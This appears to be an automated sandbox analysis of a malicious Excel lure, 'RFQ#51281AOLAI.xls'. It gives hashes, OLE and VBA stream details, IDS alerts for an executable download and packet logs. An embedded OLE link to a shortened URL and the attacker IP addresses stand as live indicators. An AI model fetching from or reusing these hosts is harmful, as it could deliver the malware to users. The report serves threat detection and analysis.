                        SHA1:74056fd5b1e7456fd00014c677d7b85ef65c4a8a
                        SHA256:048a0f6be28b03503cde3fecf918773e1dadbe0a50b24c7dc9fe430665bc0cbb
                        SHA512:86e16dbe5b203a5539d10b4cc39d20203c82ddcf7dcf90f4d99e0428edbb22af446c82fa941299237efd0bb06183279e4304837a5cce29b91f42ab07dbdec644
                        SSDEEP:24576:yZwsLEh7JvrW42STWET0i9CaIw2qelci6OUTmyZ6hAPuP:yysK7VW42SjldSy4APY
                        TLSH:F53523B1FE638E9BE0075B3848DBA71302A4FDE2EE81851B1794770E693AB75354342D
                        File Content Preview:........................>...................................d...................................................g.......h.......j.......l.......n..............................................................................................................

                        File Icon

                        Icon Hash:276ea3a6a6b7bfbf

                        Static OLE Info

                        General

                        Document Type:OLE
                        Number of OLE Files:1

                        OLE File "RFQ#51281AOLAI.xls"

                        Indicators
                        Has Summary Info:
                        Application Name:Microsoft Excel
                        Encrypted Document:True
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:True
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:False
                        Flash Objects Count:0
                        Contains VBA Macros:True
                        Summary
                        Code Page:1252
                        Author:
                        Last Saved By:
                        Create Time:2006-09-16 00:00:00
                        Last Saved Time:2024-07-26 01:51:49
                        Creating Application:Microsoft Excel
                        Security:1
                        Document Summary
                        Document Code Page:1252
                        Thumbnail Scaling Desired:False
                        Contains Dirty Links:False
                        Shared Document:False
                        Changed Hyperlinks:False
                        Application Version:786432

                        Streams with VBA

                        VBA File Name: Sheet1.cls, Stream Size: 977
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                        VBA File Name:Sheet1.cls
                        Stream Size:977
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 a8 08 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        VBA Code
                        Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                        VBA File Name: Sheet2.cls, Stream Size: 977
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                        VBA File Name:Sheet2.cls
                        Stream Size:977
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T < . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 ba 3c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        VBA Code
                        Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                        VBA File Name: Sheet3.cls, Stream Size: 977
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                        VBA File Name:Sheet3.cls
                        Stream Size:977
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T 4 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 34 8a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        VBA Code
                        Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                        VBA File Name: ThisWorkbook.cls, Stream Size: 985
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                        VBA File Name:ThisWorkbook.cls
                        Stream Size:985
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 54 92 1d 10 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        VBA Code
                        Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                        Streams

                        Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                        General
                        Stream Path:\x1CompObj
                        CLSID:
                        File Type:data
                        Stream Size:114
                        Entropy:4.25248375192737
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                        General
                        Stream Path:\x5DocumentSummaryInformation
                        CLSID:
                        File Type:data
                        Stream Size:244
                        Entropy:2.889430592781307
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                        General
                        Stream Path:\x5SummaryInformation
                        CLSID:
                        File Type:data
                        Stream Size:200
                        Entropy:3.282068105701866
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . ( ` . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                        Stream Path: MBD001BDE15/\x1CompObj, File Type: data, Stream Size: 99
                        General
                        Stream Path:MBD001BDE15/\x1CompObj
                        CLSID:
                        File Type:data
                        Stream Size:99
                        Entropy:3.631242196770981
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                        Stream Path: MBD001BDE15/Package, File Type: Microsoft Excel 2007+, Stream Size: 569795
                        General
                        Stream Path:MBD001BDE15/Package
                        CLSID:
                        File Type:Microsoft Excel 2007+
                        Stream Size:569795
                        Entropy:7.972309072920344
                        Base64 Encoded:True
                        Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d4 fe 94 9a b9 01 00 00 c0 06 00 00 13 00 d1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Stream Path: MBD001BDE16/\x1Ole, File Type: data, Stream Size: 352
                        General
                        Stream Path:MBD001BDE16/\x1Ole
                        CLSID:
                        File Type:data
                        Stream Size:352
                        Entropy:6.486914378277046
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . t . n . y . . . w . t . f . / . d . G . a . . . . 0 o Y . ' q N . 5 . . . 8 , 2 . K ) N % v . . . @ k z . 3 8 R 7 g . I + P M - . $ . P ( P . . . j h " K . t . . 7 i w . g > A ; c . ] , h . ' s ] . J b - \\ V = j b . * V . H $ { ! . n + % w - e j } P s G } M } . . Q . ~ i " . . . . . . . . . . . . . . . . . . . . Z . b . u . 0 . E . . . E v . 3 ( k ^ | z . E . ` \\ M
                        Data Raw:01 00 00 02 f5 7f a1 1b 12 aa 06 73 00 00 00 00 00 00 00 00 00 00 00 00 f4 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f0 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 74 00 6e 00 79 00 2e 00 77 00 74 00 66 00 2f 00 64 00 47 00 61 00 00 00 d9 1b 30 6f 59 1d 27 71 4e bd 84 1d ff 35 a4 96 aa 1f f4 00 c2 bd 38 c8 2c 32 c8 dd 7f c8 ce ed 4b 29 8a b2 4e a6 8e 25 c0 76
                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 562218
                        General
                        Stream Path:Workbook
                        CLSID:
                        File Type:Applesoft BASIC program data, first line number 16
                        Stream Size:562218
                        Entropy:7.999418476587462
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . | . . z . g ( R * ^ ' ^ Q V # @ \\ 6 . . . . . . . . . . . . \\ . p . ? E < & d + . . t % . C V @ " 0 o [ c . . M { w ? . X n t 3 2 . . . . . 7 . [ ' & z ^ . @ . @ ; w . . . } # _ . B . . . \\ N a . . . g K . . . = . . . F ^ e > . . . . q K 1 o | . " . . . . > c . . . . . . . . . . . . . . . . . . B . . . T = . . . . q x t . 4 @ . . . E . . . " . . . < . . . . . o . . . { . . . . 1 . . . E @ . . N . 3 . . $ { i . a . E z b 1 . . . . . . L . @ 7 w . L >
                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c8 15 e1 fb fb bc ab 1b f2 7c 11 de 97 98 7a 93 9d ef 03 9b 67 28 eb 52 2a e4 db 5e 27 5e de e0 d1 51 fc 56 ab 98 23 cc 40 d2 cb f0 5c 92 36 05 e1 00 02 00 b0 04 c1 00 02 00 a8 17 e2 00 00 00 5c 00 70 00 86 3f 45 c1 3c f3 99 26 85 e1 64 b8 cd 2b c3 db 0f ad 1e 74 25 82 89 9e e6 b3 ad 43 aa 56
                        Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523
                        General
                        Stream Path:_VBA_PROJECT_CUR/PROJECT
                        CLSID:
                        File Type:ASCII text, with CRLF line terminators
                        Stream Size:523
                        Entropy:5.211133089273723
                        Base64 Encoded:True
                        Data ASCII:I D = " { 4 A C A F 9 D F - 9 D 0 6 - 4 9 C C - 9 4 8 2 - 0 2 6 2 8 1 5 2 3 1 F D } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 6 2 6 0 8 1 1 3 D 5 1 7 D 5 1 7 D
                        Data Raw:49 44 3d 22 7b 34 41 43 41 46 39 44 46 2d 39 44 30 36 2d 34 39 43 43 2d 39 34 38 32 2d 30 32 36 32 38 31 35 32 33 31 46 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                        Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                        General
                        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                        CLSID:
                        File Type:data
                        Stream Size:104
                        Entropy:3.0488640812019017
                        Base64 Encoded:False
                        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                        Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                        CLSID:
                        File Type:data
                        Stream Size:2644
                        Entropy:4.005444285593956
                        Base64 Encoded:False
                        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                        Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/dir
                        CLSID:
                        File Type:data
                        Stream Size:553
                        Entropy:6.371567531783539
                        Base64 Encoded:True
                        Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                        Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 92 f7 b3 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                        2024-07-26T13:40:28.015784+0200TCP2022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M18049166104.219.239.104192.168.2.22
                        2024-07-26T13:40:28.186759+0200TCP2022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M28049166104.219.239.104192.168.2.22

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jul 26, 2024 13:40:18.538950920 CEST4916180192.168.2.22188.114.97.3
                        Jul 26, 2024 13:40:18.546729088 CEST8049161188.114.97.3192.168.2.22
                        Jul 26, 2024 13:40:18.546834946 CEST4916180192.168.2.22188.114.97.3
                        Jul 26, 2024 13:40:18.547000885 CEST4916180192.168.2.22188.114.97.3
                        Jul 26, 2024 13:40:18.552987099 CEST8049161188.114.97.3192.168.2.22
                        Jul 26, 2024 13:40:19.673207998 CEST8049161188.114.97.3192.168.2.22
                        Jul 26, 2024 13:40:19.676037073 CEST4916180192.168.2.22188.114.97.3
                        Jul 26, 2024 13:40:19.692862988 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:19.699067116 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:19.699163914 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:19.699269056 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:19.706147909 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.214741945 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.214834929 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.215567112 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.215594053 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.215670109 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.218549967 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.218569994 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.218642950 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.222795963 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.222826958 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.222856998 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.222893000 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.227536917 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.227555990 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.227778912 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.232242107 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.232275963 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.232314110 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.232505083 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.235816002 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.235832930 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.235862017 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.235918999 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.303642988 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.303764105 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.304616928 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.304636955 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.304786921 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.307682991 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.307800055 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.309339046 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.309396982 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.311095953 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.311105013 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.311173916 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.314682007 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.314755917 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.316468000 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.316533089 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.317946911 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.317955971 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.317971945 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.318003893 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.318027020 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.320941925 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.320988894 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.322360992 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.322407961 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.323849916 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.323858023 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.323909998 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.327682972 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.327697992 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.327769041 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.329760075 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.329783916 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.329818964 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.329863071 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.332911968 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.332926989 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.332933903 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.332964897 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.332989931 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.335376978 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.335433006 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.392635107 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.392832994 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.393007040 CEST8049162104.219.239.104192.168.2.22
                        Jul 26, 2024 13:40:20.393083096 CEST4916280192.168.2.22104.219.239.104
                        Jul 26, 2024 13:40:20.393285990 CEST8049162104.219.239.104192.168.2.22
